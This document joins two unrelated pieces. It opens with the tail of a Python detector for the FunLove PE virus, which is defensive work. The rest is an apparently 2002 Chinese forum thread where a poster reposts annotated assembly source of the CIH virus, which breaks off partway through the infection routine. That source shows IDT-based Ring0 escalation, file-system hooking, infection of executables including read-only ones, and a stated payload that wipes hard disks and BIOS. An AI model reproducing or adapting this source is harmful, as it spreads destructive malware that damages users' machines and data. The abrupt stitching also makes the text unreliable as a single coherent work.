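SCN_CLEARED = 0x12000000                 # SHARED | DISCARDABLE, which the infector clears


def parse_pe(data):
    """Return (entry_rva, sections) for a PE32 image, or None if the headers do not parse."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x2C > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    entry_rva = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]   # the [edi+28] the virus reads
    table = e_lfanew + 0x18 + opt_size                                # first section header
    sections = []
    for i in range(n_sections):
        off = table + i * 0x28
        if off + 0x28 > len(data):
            return None
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 0x24)[0]        # the [esi+24] field it patches
        sections.append({"vsize": vsize, "va": va, "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": chars})
    return entry_rva, sections


def rva_to_offset(rva, sections):
    """Map an RVA to a file offset via the section table; None if it lies outside every section."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    return None


def scan(data):
    """Report which FunLove indicators one PE image carries."""
    result = {"is_pe": False, "size_marker": False, "ep_stub": False,
              "last_section_rwx": False, "verdict": "not a PE file"}
    parsed = parse_pe(data)
    if parsed is None:
        return result
    entry_rva, sections = parsed
    result["is_pe"] = True
    result["size_marker"] = (len(data) & 0xFF) == 3          # the infector's own "already infected" test
    ep_off = rva_to_offset(entry_rva, sections)
    if ep_off is not None and ep_off + 8 <= len(data):
        result["ep_stub"] = data[ep_off:ep_off + 4] == FUNLOVE_EP_STUB
    if sections:
        chars = sections[-1]["chars"]
        result["last_section_rwx"] = (chars & SCN_SET) == SCN_SET and (chars & SCN_CLEARED) == 0
    if result["ep_stub"] and result["size_marker"]:
        result["verdict"] = "likely FunLove-infected"
    elif result["ep_stub"] or result["last_section_rwx"]:
        result["verdict"] = "suspicious: partial match"
    else:
        result["verdict"] = "no FunLove indicators"
    return result


def build_sample_pe(infected):
    """Constructed test fixture: a tiny two-section PE32 image (assumed layout, not a real program)."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)      # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)   # ImageBase
    struct.pack_into("<I", opt, 0x20, 0x1000)     # SectionAlignment
    struct.pack_into("<I", opt, 0x24, 0x200)      # FileAlignment
    struct.pack_into("<I", opt, 0x38, 0x3000)     # SizeOfImage
    struct.pack_into("<I", opt, 0x3C, 0x200)      # SizeOfHeaders
    struct.pack_into("<H", opt, 0x44, 2)          # Subsystem = GUI, the [edi+5C] value the infector requires
    hdr = "<8sIIIIIIHHI"
    text = struct.pack(hdr, b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data_chars = 0xC0000040
    if infected:
        data_chars = (data_chars | SCN_SET) & ~SCN_CLEARED
    last = struct.pack(hdr, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0, data_chars)
    headers = (dos + b"PE\x00\x00" + coff + bytes(opt) + text + last).ljust(0x200, b"\x00")
    body = bytearray(b"\xC3" + b"\x00" * 0x1FF)                              # .text: a bare ret
    if infected:
        body[:8] = FUNLOVE_EP_STUB + struct.pack("<I", 0x1000)               # constructed displacement
    image = headers + bytes(body) + b"\x00" * 0x200
    if infected:
        image += b"\x00" * 0x1000 + b"\x00" * 3   # appended block plus the 3-byte size marker
    return image
```

To check a real file, call `scan(open(path, "rb").read())`. The verdict deliberately separates a full match (entry stub plus size marker) from a partial one, because a writable, non-discardable last section on its own is common in legitimate packed binaries and should be treated as a weak signal.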
Reply #13
Posted: 2002-05-29 15:10
Although the code is simple, it is long and takes a long time to study.
Brother yiyiz really has perseverance.
Reply #14
Posted: 2002-05-29 15:21
"Although the code is simple, it is long and takes a long time to study." That is just something he reposted, not something he annotated, and the person who did annotate it was not very detailed either.
Reply #15
Posted: 2002-05-31 19:45
CIH source code
; **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TTIT of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ;编译连接方法 ; * * ;使用的是TurboAssembler ; *==========================================================================* ;可在Borland C++ 3.1中找到 ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn\'t Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn\'t be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don\'t be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it\'s Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. 
* ; * 4. The Virus \"Basic\" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus \"Basic\" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don\'t Infect it. * ; * 05/24/1998 2. The Virus \"Basic\" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus \"Basic\" Size is 1019 Bytes. * ; **************************************************************************** .586P ;586保护模式汇编 ; **************************************************************************** ; * Original PE Executable File(Don\'t Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: ;编译连接后的PE格式可执行文件文件头 db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 
000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 
000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; **************************************************************************** ; * My Virus Game * ; **************************************************************************** ; ********************************************************* ; * Constant Define * ; ********************************************************* TRUE = 1 FALSE = 0 DEBUG = TRUE MajorVirusVersion = 1 ;主版本号 MinorVirusVersion = 4 ;副版本号 VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号 IF DEBUG ;是否是调试用 FirstKillHardDiskNumber = 81h ;杀掉第二个硬盘“d:” HookExceptionNumber = 05h ;使用5号中断 ELSE FirstKillHardDiskNumber = 80h ;杀掉第一个硬盘“c:” HookExceptionNumber = 03h ;使用3号中断 ENDIF FileNameBufferSize = 7fh ; ********************************************************* ; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* MyVirusStart: push ebp ; ************************************* ; * Let\'s Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx ;获取程序起始偏移量? 
;用此偏移量+相对偏移量获得绝对地址(病毒程序大量用到) lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let\'s Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address ?;获得中断描述符表的基址到ebx pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;计算要用中断的基址到ebx cli ;在改表项前关中断? mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point ?;取得中断基址到ebp lea esi, MyExceptionHook-@1[ecx] push esi ?;esi为病毒中断例程地址 mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address;修改中断基址使指向病毒中断例程 pop esi ; ************************************* ; * Generate Exception to Get Ring0 * ; ************************************* int HookExceptionNumber ; GenerateException;以中断的方式进入0级 ReturnAddressOfEndException = $ ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax ;esi指向病毒开始处 LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb ;拷贝病毒代码到分配好的系统内存首址 sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束 jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段 QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Aga ;再一次进入0级 ; ************************************* ; * Let\'s Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti ;开中断 xor ebx, ebx jmp RestoreSE ; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. 
* ; ************************************* StopToRunVirusCode: @1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ;把原程序的开始地址压栈 ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的开始处 ; ********************************************************* ; * Ring0 Virus Game Initial Program * ; ********************************************************* MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了 ;转到安装文件系统钩子的程序 ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志) jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存 add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; ************************************* ; * Return to Ring3 Initial Program * ; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; ;恢复原来的中断基址 iretd ;中断返回 ; ************************************* ; * Allocate SystemMemory Page to Use * ; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System ;设置dr0,它是病毒驻留的标志 push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, ;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, ;ULONG flags); push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate;VXD调用 _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h ;恢复栈指针 xchg edi, eax ; EDI = SystemMemory Start Address ; EDI指向分配好的系统内存首址 lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处 iretd ; Return to Ring3 Initial Program ;退出中断,回3级(回到\"Merge All Virus 
Code Section\") ; ************************************* ; * Install My File System Api Hook * ; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] ;指向文件系统钩子程序首址 push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags ;在调用后变为call [IFSMgr_InstallFileSystemApiHook] mov dr0, eax ; Save OldFileSystemApiHook Address ;保存原来的文件系统钩子程序首址到dr0(改调用的返回值是前一个链值) pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] ;edx为IFSMgr_InstallFileSystemApiHook功能的地址 mov OldInstallFileSystemApiHook-@3[eax], edx ?;保存 ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax ?;设置新的IFSMgr_InstallFileSystemApiHook功能调用的地址 ;使指向InstallFileSystemApiHook cli jmp ExitRing0Init ?;退出0级(int 3 or int 5) ; ********************************************************* ; * Code Size of Merge Virus Code Section * ; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: ;新的IFSMgr_InstallFileSystemApiHook功能调用 push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook ;获得当前指令的偏移地址 add ebx, FileSystemApiHook-@4 ;加上偏移的差=FileSystemApiHook的偏移 push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ;调用VXD移去指向FileSystemApiHook的钩子 IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags ;调用号 pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] ;调用原来的IFSMgr_InstallFileSystemApiHook功能设置钩子 pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My 
FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] ;调用原来的IFSMgr_InstallFileSystemApiHook功能设置钩子 pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address ;调整原来的地址 pop eax pop ebx ret ; ********************************************************* ; * Static Data * ; ********************************************************* OldInstallFileSystemApiHook dd ? ;原来的InstallFileSystemApiHook调用的地址 ; ********************************************************* ; * IFSMgr_FileSystemHook * ; ********************************************************* ; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; ************************************* FileSystemApiHook: ;安装好的文件系统钩子 @3 = FileSystemApiHook pushad ;保存寄存器(20h长) call @5 ; @5: ; pop esi ; mov esi, offset ;esi为当前指令的偏移 add esi, VirusGameDataStartAddress-@5 ;esi为FileSystemApiHook的偏移加上到VirusGameDataStartAddress的偏移之差=VirusGameDataStartAddress的偏移 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) ;测试\"忙\"标志 jnz pIFSFunc ; goto pIFSFunc ;\"忙\"则转到pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] ;ebx为FunctionNum的地址 ;文件系统钩子的调用格式如下 ;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,int ResourceFlags, int CodePage, pioreq pir) ;助标2 cmp dword ptr [ebx], 00000024h ;测试此次调用是否是为了打开文件 ;在DDK的ifs.h中定义的#define IFSFN_OPEN 36 jne prevhook ;不是就跳到前一个文件钩子去 ; ************************************* ; * Enable OnBusy * ; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;设置\"忙\"标志为\"忙\" ; ************************************* ; * Get FilePath\'s DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is \'C:\'. 
* ; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer push esi ;保存之 mov al, [ebx+04h] ;ebx+4为int Drive的地址 cmp al, 0ffh ;是否是UNC(universal naming conventions)地址 je CallUniToBCSPath ;是就转 add al, 40h mov ah, \':\' mov [esi], eax ;处理成\"X:\"的形式 inc esi inc esi ; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ;把Canonicalized Unicode的字符转换为普通的BCS字符集 ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; ************************************* ;调用方法 UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet) CallUniToBCSPath: push 00000000h ;字符集 push FileNameBufferSize ;字符长度 mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax ;Uni字符首址 push esi ;BCS字符首址 int 20h ; VXDCall UniToBCSPath ;调用UniToBCSPath UniToBCSPath = $ dd 00400041h ;调用id add esp, 04h*04h ; ************************************* ; * Is FileName \'.EXE\' !? * ; ************************************* ; cmp [esi+eax-04h], \'.EXE\' cmp [esi+eax-04h], \'EXE.\' ;测试是否是*.EXE(可执行)文件 pop esi jne DisableOnBusy IF DEBUG ; ************************************* ; * Only for Debug * ; ************************************* ; cmp [esi+eax-06h], \'FUCK\' cmp [esi+eax-06h], \'KCUF\' ;如果是测试用途则测试是否是\"FUCK.EXE\" jne DisableOnBusy ENDIF ; ************************************* ; * Is Open Existing File !? * ; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h ;测试是否打开 jne DisableOnBusy ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/GET_ATTRIBUTES) int 20h ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的获得文件属性的功能 IFSMgr_Ring0_FileIO = $ dd 00400032h ;调用号 jc DisableOnBusy ;失败否? 
push ecx ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ;获得IFSMgr_Ring0_FileIO调用的地址 ; ************************************* ; * Is Read-Only File !? * ; ************************************* test cl, 01h jz OpenFile ;测试是否是只读文件 ; ************************************* ; * Modify Read-Only File to Write * ; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES ) xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的改文件属性功能,使文件可写 ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h ;IFSMgr_Ring0_FileIO的打开文件功能号(R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT) xor ecx, ecx ;文件属性 xor edx, edx inc edx mov ebx, edx inc ebx ;esi为文件名首址 call edi ; VXDCall IFSMgr_Ring0_FileIO ;调用IFSMgr_Ring0_FileIO的打开文件功能 xchg ebx, eax ; mov ebx, FileHandle ;在ebx中保存文件句柄 ; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ;是否需要恢复文件属性(有写属性就不需要恢复了) ; ************************************* ; * Restore Attributes of the File * ; ************************************* mov ax, 4301h ;IFSMgr_Ring0_FileIO的获得文件属性号(R0_FILEATTRIBUTES/SET_ATTRIBUTES) call edi ; VXDCall IFSMgr_Ring0_FileIO ;恢复文件属性 ; ************************************* ; * Is Open File OK !? * ; ************************************* IsOpenFileOK: popf jc DisableOnBusy ;打开是否成功? ; ************************************* ; * Open File Already Succeed. 
^__^ * ; ************************************* push esi ; Push FileNameBuffer Address to Stack ;把文件名数据区首址压栈 pushf ; Now CF = 0, Push Flag to Stack ;保存标志位 add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ;esi指向数据区首址 ; *************************** ; * Get OffsetToNewHeader * ; *************************** xor eax, eax mov ah, 0d6h ;IFSMgr_Ring0_FileIO的读文件功能号(R0_READFILE) ; For Doing Minimal VirusCode\'s Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h ;读取4个字节 pop ecx push 0000003ch ;读取dos文件头偏移3ch处的Windows文件头首部偏移 pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi mov edx, [esi] ;Windows文件头首部偏移放到edx ; *************************** ; * Get \'PE\\0\' Signature * ; * of ImageFileHeader, and * ; * Infected Mark. * ; *************************** dec edx mov eax, ebp ;功能号 call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi ; *************************** ; * Is PE !? * ; *************************** ; * Is the File * ; * Already Infected !? * ; *************************** ; * WinZip Self-Extractor * ; * doesn\'t Have Infected * ; * Mark Because My Virus * ; * doesn\'t Infect it. * ; *************************** ; cmp [esi], \'\\0PE\\0\' cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志\"PE\\0\\0\") jne CloseFile ;不是就关闭文件 ; ************************************* ; * The File is ^o^ * ; * PE(Portable Executable) indeed. * ; ************************************* ; * The File isn\'t also Infected. * ; ************************************* ; ************************************* ; * Start to Infect the File * ; ************************************* ; * Registers Use Status Now : * ; * * ; * EAX = 04h * ; * EBX = File Handle * ; * ECX = 04h * ; * EDX = \'PE\\0\\0\' Signature of * ; * ImageFileHeader Pointer\'s * ; * Former Byte. 
* ; * ESI = DataBuffer Address ==> @8 * ; * EDI = IFSMgr_Ring0_FileIO Address * ; * EBP = D600h ==> Read Data in File * ; ************************************* ; * Stack Dump : * ; * * ; * ESP => ------------------------- * ; * | EFLAG(CF=0) | * ; * ------------------------- * ; * | FileNameBufferPointer | * ; * ------------------------- * ; * | EDI | * ; * ------------------------- * ; * | ESI | * ; * ------------------------- * ; * | EBP | * ; * ------------------------- * ; * | ESP | * ; * ------------------------- * ; * | EBX | * ; * ------------------------- * ; * | EDX | * ; * ------------------------- * ; * | ECX |
|
Post #16
Posted on: 2002-05-31 19:49
; continued:
| * ; * ------------------------- * ; * | EAX | * ; * ------------------------- * ; * | Return Address | * ; * ------------------------- * ; ************************************* push ebx ; Save File Handle ;保存文件句柄 push 00h ; Set VirusCodeSectionTableEndMark ; *************************** ; * Let\'s Set the * ; * Virus\' Infected Mark * ; *************************** push 01h ; Size push edx ; Pointer of File ;edx指向PE文件头偏移00h push edi ; Address of Buffer ;edi为IFSMgr_Ring0_FileIO的地址(原注释有误) ; *************************** ; * Save ESP Register * ; *************************** mov dr1, esp ; *************************** ; * Let\'s Set the * ; * NewAddressOfEntryPoint * ; * ( Only First Set Size ) * ; *************************** push eax ; Size ; *************************** ; * Let\'s Read * ; * Image Header in File * ; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead ;要读2个字节(WORD NumberOfSections) add edx, 07h ; Move EDX to NumberOfSections ;PE文件头+07h为NumberOfSections(块个数) call edi ; VXDCall IFSMgr_Ring0_FileIO ;读出NumberOfSections(块个数)到esi ; *************************** ; * Let\'s Set the * ; * NewAddressOfEntryPoint * ; * ( Set Pointer of File, * ; * Address of Buffer ) * ; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; *************************** ; * Move EDX to the Start * ; * of SectionTable in File * ; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ;edx为SectionTable的偏移 ; *************************** ; * Let\'s Get * ; * Total Size of Sections * ; *************************** mov al, SizeOfScetionTable ;每个块表项(ScetionTable)的大小(字节) ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ;每个块表项乘以块个数=块表大小 ; *************************** ; * Let\'s Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, 
(StartOfSectionTable-@8)[esi] ;esi指向块表首址(在病毒动态数据区中) push eax ; Size ;块表大小 push edx ; Pointer of File ;edx为SectionTable的偏移 push esi ; Address of Buffer ; ; *************************** ; * The Code Size of Merge * ; * Virus Code Section and * ; * Total Size of Virus * ; * Code Section Table Must * ; * be Small or Equal the * ; * Unused Space Size of * ; * Following Section Table * ; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h ;*8 push ecx ; Save TotalSizeOfVirusCodeSectionTable ;预留病毒块表空间 add ecx, eax add ecx, edx ;ecx+文件的正文的偏移 sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ;求补 ;ecx为文件头大小-正文的偏移=未用空间 ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ;ecx为块表大小 ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址 add eax, (ImageBase-@9)[esi] ;装入基址 mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存装入后实际的入口地址 cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空间和病毒第一块大小比较 jl OnlySetInfectedMark ;小于就只设感染标志 ; *************************** ; * Read All Section Tables * ; *************************** mov eax, ebp ;读的功能号 call edi ; VXDCall IFSMgr_Ring0_FileIO 